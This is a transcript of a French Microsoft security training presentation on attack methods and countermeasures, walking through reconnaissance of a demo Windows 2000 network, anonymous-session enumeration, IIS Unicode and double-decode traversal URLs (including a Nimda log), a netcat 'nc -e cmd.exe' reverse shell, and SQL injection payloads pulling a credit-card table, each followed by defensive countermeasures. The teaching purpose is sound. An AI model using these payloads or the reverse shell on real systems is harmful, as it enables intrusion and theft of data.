Méthodes d’attaque et contre-mesures

Présentation au sujet: "Méthodes d’attaque et contre-mesures"— Transcription de la présentation:

1 Méthodes d’attaque et contre-mesures
3/26/2017 3:55 PM Méthodes d’attaque et contre-mesures Cyril Voisin Chef de programme sécurité Pascal Sauliere Consultant principal sécurité Microsoft France

2 Avertissement Le but de cette présentation est pédagogique:
3/26/2017 3:55 PM Avertissement Le but de cette présentation est pédagogique: Illustrer certaines faiblesses, certaines erreurs courantes en s’appuyant sur des attaques connues Et surtout en déduire les moyens de mieux vous protéger, pour éviter ces types d’attaques Important : les attaques faisant intervenir des vulnérabilités ont été choisies pour illustrer les propos, et font volontairement appel à des vulnérabilités connues depuis plusieurs mois ou années et dont les corrections sont disponibles et largement diffusées

3 Rappel : la loi sanctionne…
3/26/2017 3:55 PM Rappel : la loi sanctionne… Loi du 5 janvier 1986 relative a la fraude informatique, dite Loi Godefrain Articles et suivants du Code pénal 323-1 : Le fait d'accéder ou de se maintenir, frauduleusement, dans tout ou partie d'un système de traitement automatisé de données est puni d'un an d'emprisonnement et de 15000 euros d'amende.    Lorsqu'il en est résulté soit la suppression ou la modification de données contenues dans le système, soit une altération du fonctionnement de ce système, la peine est de deux ans d'emprisonnement et de 30000 euros d'amende. 323-2 :  Le fait d'entraver ou de fausser le fonctionnement d'un système de traitement automatisé de données est puni de trois ans d'emprisonnement et de 45000 euros d'amende. 323-3 : Le fait d'introduire frauduleusement des données dans un système de traitement automatisé ou de supprimer ou de modifier frauduleusement les données qu'il contient est puni de trois ans d'emprisonnement et de 45000 euros d'amende.

4 Démarche théorique… Renseignement Scanning Énumération Pénétration
3/26/2017 3:55 PM Démarche théorique… Renseignement Scanning Énumération Pénétration Élévation de privilège Accès interactif Nettoyage

5 3/26/2017 3:55 PM …dans la pratique : Énumérer tout ce que l’on peut (adresses, ports, services, OS, versions, utilisateurs…) Tester toutes les vulnérabilités connues Contourner les protections, trouver la petite porte Casser les mots de passe Installer son rootkit Cacher ses traces

6 3/26/2017 3:55 PM Scénario Jean-Kevin fait un stage au service courrier chez PLA S.A. (Pieds de Lunettes Astronomiques)… …Il est mal payé… …Il a du temps… …Il apporte son PC portable et le branche sur le réseau. 2003 CSI/FBI Computer Crime and Security Survey : Les formes d’attaques citées le plus souvent sont les virus (82%) et les abus par des utilisateurs internes (80%)

7 3/26/2017 3:55 PM Réseau à découvrir

8 3/26/2017 3:55 PM Ping Sweep Objectif : énumérer les machines qui répondent au Ping (ICMP Echo Request) Outils : Ping (Windows) Nmap -sP (Fyodor, insecure.org) sl -n (ScanLine, ex-fscan de Foundstone) … Découverte du sous-réseau local : ipconfig /all Sous-réseau : /24 Ping Sweep avec nmap : nmap –sP * Résultat : MARS VENUS HALLEY

9 Adresses et noms MARS VENUS HALLEY 192.168.11.2 192.168.11.3
3/26/2017 3:55 PM Adresses et noms MARS VENUS HALLEY

10 3/26/2017 3:55 PM Port Scanning Objectif : énumérer les services présents sur une machine (Ports TCP et UDP « ouverts ») Outils : Nmap (insecure.org) sl (Foundstone) SuperScan (Foundstone) Port Scanning avec nmap : limiter le scan aux adresses découvertes précédemment nmap 88 (Kerberos), 389 (LDAP), 636 (LDAPS)  contrôleur de domaine Windows 2000 ou 2003 3268 (GC) et 3269 (GC/SSL)  DC+GC (global catalog). 25 (smtp)  serveur SMTP 80 (http) et 443 (https)  serveur WWW. 1433  SQL Server. Résultat : MARS DC, GC VENUS SMTP, WWW HALLEY DC, GC, SQL Server

11 Services MARS VENUS HALLEY DC SMTP HTTP HTTPS DC SQL 192.168.11.2
3/26/2017 3:55 PM Services MARS VENUS HALLEY DC SMTP HTTP HTTPS DC SQL

12 Détermination des versions
3/26/2017 3:55 PM Détermination des versions Versions des OS Versions des services Exemple : Outils : nc (NetCat Nmap -sV -O C:\>nc 80 HEAD / HTTP/1.0 HTTP/ Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 08 Apr :55:19 GMT Content-Type: text/html Content-Length: 172 Version Scanning avec nmap : nmap –sV –O Commande exécutée à la fin de la démo précédente, ou montrer avec Notepad le fichier nmap-sV-O.txt dans <My Documents>. Résultat : les serveurs sont en Windows 2000.

13 Version des OS MARS VENUS HALLEY DC IIS DC SQL W2000 W2000 W2000
3/26/2017 3:55 PM Version des OS MARS VENUS HALLEY DC IIS DC SQL W2000 W2000 W2000

14 3/26/2017 3:55 PM Énumération NetBIOS Objectifs : machines, domaines, contrôleurs de domaine Outils : Nbtstat Nbtscan Name Service Type CORP-DC <00> UNIQUE CORP-DC <20> UNIQUE CORP <00> GROUP CORP <1c> GROUP CORP <1b> UNIQUE CORP-DC <03> UNIQUE CORP <1e> GROUP INet~Services <1c> GROUP IS~CORP-DC <00> UNIQUE CORP <1d> UNIQUE ??__MSBROWSE__? <01> GROUP ADMIN <03> UNIQUE Contrôleur de domaine Énumération NetBIOS avec Nbtscan.exe : Liste : nbtscan.exe Détails par machine : nbtscan -v Résultat : Domaines auxquels appartiennent les machines : MARS et VENUS : PLA HALLEY : FINANCE Rappel des codes des services NetBIOS : Name Service Type CORPDC <00> UNIQUE Workstation Service CORPDC <20> UNIQUE File Server Service CORP <00> GROUP Domain Name CORP <1c> GROUP Domain Controllers CORP <1b> UNIQUE Domain Master Browser CORPDC <03> UNIQUE Messenger Service CORP <1e> GROUP Browser Service Elections INet~Services <1c> GROUP IIS IS~CORPDC <00> UNIQUE IIS CORP <1d> UNIQUE Master Browser ??__MSBROWSE__? <01> GROUP Master Browser Utilisateur

15 PLA FINANCE MARS VENUS HALLEY DC IIS DC SQL W2000 W2000 W2000
3/26/2017 3:55 PM PLA FINANCE MARS VENUS HALLEY DC IIS DC SQL W2000 W2000 W2000

16 3/26/2017 3:55 PM Contre-mesures Bloquer l’accès aux ressources pour les machines qui n’appartiennent pas au domaine IPsec avec authentification Kerberos Authentification 802.1x sur les switches Même principe que réseaux Wi-Fi Authentification couche 2

17 Sessions anonymes Accès anonymes à des ressources
3/26/2017 3:55 PM Sessions anonymes Accès anonymes à des ressources net use \\server /user:"" "" Nombreux outils pour lister : Utilisateurs Groupes Relations d’approbations Contrôleurs de domaine Membres Stratégies de mots de passe

18 Relations d’approbation
3/26/2017 3:55 PM Relations d’approbation Système de SSO depuis NT 3.x Si DomB approuve DomA (DomB  DomA), un utilisateur de DomA a accès à des ressources de DomB Risque du SSO : Un compte compromis donne accès à l’ensemble des ressources Découverte des relations d’approbation : nltest /domain_trusts DomA DomB Approbation Accès aux ressources Connexion anonyme : net use \\mars /user:"" "" net use \\halley /user:"" "" Relations d’approbation : nltest /server:mars /domain_trusts nltest /server:halley /domain_trusts Résultat : finance.local  pla.net Au passage, on a les noms complets des domaines, mais on aurait aussi pu les obtenir par DNS (ping –a mars et ping –a halley). Nltest est dans les Support Tools de Windows XP

19 3/26/2017 3:55 PM Approbation Accès aux ressources DomA DomB

20 Approbation pla.net finance.local MARS VENUS HALLEY DC IIS DC SQL
3/26/2017 3:55 PM Approbation pla.net finance.local MARS VENUS HALLEY DC IIS DC SQL W2000 W2000 W2000

21 Énumération des utilisateurs et groupes
3/26/2017 3:55 PM Énumération des utilisateurs et groupes Informations intéressantes : Administrateurs Comptes « temporaires », « de test » Comptes de service, applicatifs Comptes inactifs Mots de passe évidents, par défaut, ou en commentaire Outils : Nete, Nbtenum, Enum, UserDump, UserInfo, DumpSec Commandes : nete.exe /G /L \\mars [bof… userdump est plus intéresant] (userdump produit un listing assez gros… passer par Notepad) userdump \\mars Guest 200 > userdump.txt notepad userdump.txt Enum pour afficher la password policy : enum -P -c Plus interactif : dumpsec net use \\mars /user:"" "" dumpsec.exe (1) Report – Select Computer \\mars (2) Report – Dump users as table Groups UserName Comment LastLogonTime

22 Contre-mesures Sessions anonymes
3/26/2017 3:55 PM Contre-mesures Sessions anonymes Stratégies de groupe : Windows 2000 : Additional restrictions for anonymous connections Windows XP/2003 : Do not allow anonymous enumeration of SAM accounts Do not allow anonymous enumeration of SAM accounts and shares Let Everyone permissions apply to anonymous users Base de registre

23 Contre-mesures Enumération des utilisateurs
3/26/2017 3:55 PM Contre-mesures Enumération des utilisateurs Politique de gestion des comptes Comptes administrateurs Politique de mots de passe (longueur, complexité, verrouillage) Audit des comptes inutilisés Sans oublier de supprimer les LMhashes Éviter les outils de « crack » de mots de passe Stratégie de groupe ou registre : NoLMhash=1

24 Attaques d’IIS Trouver une vulnérabilité Du serveur Web
3/26/2017 3:55 PM Attaques d’IIS Trouver une vulnérabilité Du serveur Web De l’application hébergée

25 File System traversal Par défaut (NT4, W2K) :
3/26/2017 3:55 PM File System traversal Par défaut (NT4, W2K) : /scripts est exécutable Correspond à C:\Inetpub\Scripts Windows dans C:\WINNT Commandes systèmes dans : scripts/../../winnt/system32 La séquence ../ est interdite Des bugs (W2K pré-SP2 et pré-SP3) permettaient de contourner le contrôle de ../

26 File System Traversal UNICODE
3/26/2017 3:55 PM File System Traversal UNICODE RFC 2279 (codage UTF-8) – décodage après le contrôle de ‘../’ %c0%af  ‘/’ %c1%9c  ‘\’ Corrigé dans MS et W2K SP2 Double decode : décodage UTF-8, contrôle, puis 2ème décodage.. %252f  %2f  ‘/’ %25%32%66  %2f  ‘/’ %255c  %5c  ‘\’ Corrigé dans MS et W2K SP3

27 File System Traversal Pré SP2 : Pré SP3 : Exemples de commandes :
3/26/2017 3:55 PM File System Traversal Pré SP2 : Pré SP3 : system32/cmd.exe?/c+dir Exemples de commandes : cmd.exe /c dir cmd.exe /c echo xxx >> fichier.asp

28 Trace de Nimda, sept. 2001 /scripts/..%255c../winnt/system32/cmd.exe
3/26/2017 3:55 PM Trace de Nimda, sept. 2001 /scripts/..%255c../winnt/system32/cmd.exe /scripts/..%5c../winnt/system32/cmd.exe /scripts/root.exe /msadc/root.exe /c/winnt/system32/cmd.exe /d/winnt/system32/cmd.exe /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /scripts/winnt/system32/cmd.exe /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe /scripts/..%c1%1c../winnt/system32/cmd.exe /scripts/..%c0%af../winnt/system32/cmd.exe /scripts/..%252f../winnt/system32/cmd.exe /scripts/..%c1%9c../winnt/system32/cmd.exe

29 Mise en œuvre Serveur IIS (3) Ecoute : nc –l –p 2222
3/26/2017 3:55 PM Mise en œuvre Serveur IIS (3) Ecoute : nc –l –p 2222 (1) Création de upload.asp (2) Copie de Netcat (nc.exe) et cmdasp.asp Attaquant IE: CMD (scripts Perl et ASP gentiment fourni sur le web) : cd \tools\iis unicodeloader.pl venus:80 c:\inetpub\scripts Upload: cmdasp.asp, nc.exe CMD: cd tools\iis nc -l -p 2222 c:\inetpub\scripts\nc.exe -e cmd.exe cd \ & dir cd inetpub & dir cd wwwroot & dir cd demosecurity & dir type default.aspx.cs Et voilà : sqlCommand.CommandText = "Select title_id, title, price From titles Where title like '%" + TextBox1.Text + "%'"; (4) Connexion : nc –e cmd.exe xx.xx.xx.xx 2222

30 Contre mesures Répertoires web sur un volume séparé
3/26/2017 3:55 PM Contre mesures Répertoires web sur un volume séparé IIS Lockdown (désactivation composants inutiles, ACLs) + URLScan Application des correctifs de sécurité (liste avec MBSA) Configurer le pare-feu et les stratégies IPsec pour ne laisser passer que les flux autorisés (source, destination, protocole, port) : Schéma : tous les flux sont interdits, sauf ceux indiqués. En particulier, aucune communication depuis le serveur IIS vers l’Internet, hormis les réponses sur 80 et 443. IIS SQL TCP 80, 443 TCP 1433

31 Attaque de SQL Server Trouver une vulnérabilité
3/26/2017 3:55 PM Attaque de SQL Server Trouver une vulnérabilité De SQL Server (ex : Slammer) Des applications utilisant SQL Server (cross site scripting, injection SQL…) Trouver un mot de passe (SQLdict.exe)

32 Injection SQL Non spécifique à IIS, ni à SQL Server Principe :
3/26/2017 3:55 PM Injection SQL Non spécifique à IIS, ni à SQL Server Principe : Requête SQL construite avec une entrée de l’utilisateur Exemple : sqlCommand.CommandText = "Select title_id, title, price From titles Where title like '%" + TextBox1.Text + "%'"; Select title_id, title, price From titles Where title like '%XXX%' Select title_id, title, price From titles Where title like '%X' Or 1=1--%' Select title_id, title, price From titles Where title like '%X' Union select 'A',name,0 from master..sysdatabases--%' Démo : injection SQL "Silicon" ou "Computer" pour montrer que l'appli marche. blabla%' or 1=1 blabla%' or 1=1 union select 'A',name,0 from master..sysdatabases-- blabla%' or 1=1 union select 'A',name,id from pubs..sysobjects -- blabla%' or 1=1 union select 'A',name,0 from syscolumns where id = blabla%' or 1=1 union select numero_carte_de_credit,nom_sur_la_carte,0 from pubs..cartedecredits --

33 Contre mesures Sécurité intégrée Windows Mots de passe complexes
3/26/2017 3:55 PM Contre mesures Sécurité intégrée Windows Mots de passe complexes Qualité du code (procédures stockées, requêtes paramétrées, validation des entrées…)

34 Conclusions Erreur de manipulation de l’administrateur
3/26/2017 3:55 PM Conclusions Erreur de manipulation de l’administrateur Compte de test non désactivé Absence de patch IIS double decode, révélation de code (Blaster, Sasser) Erreur de développement Buffer overflow Injection SQL / utilisation de trop de privilèges Cross-site scripting Config par défaut pas assez sécurisée LMHash RestrictAnonymous

35 Ressources disponibles
Security Guidance Center Site Microsoft sur la sécurité (tout public) Site MSDN sur la sécurité (développeurs) (en anglais) Site Technet sur la sécurité (informaticiens) S'inscrire aux bulletins de sécurité : (en anglais)

36 3/26/2017 3:55 PM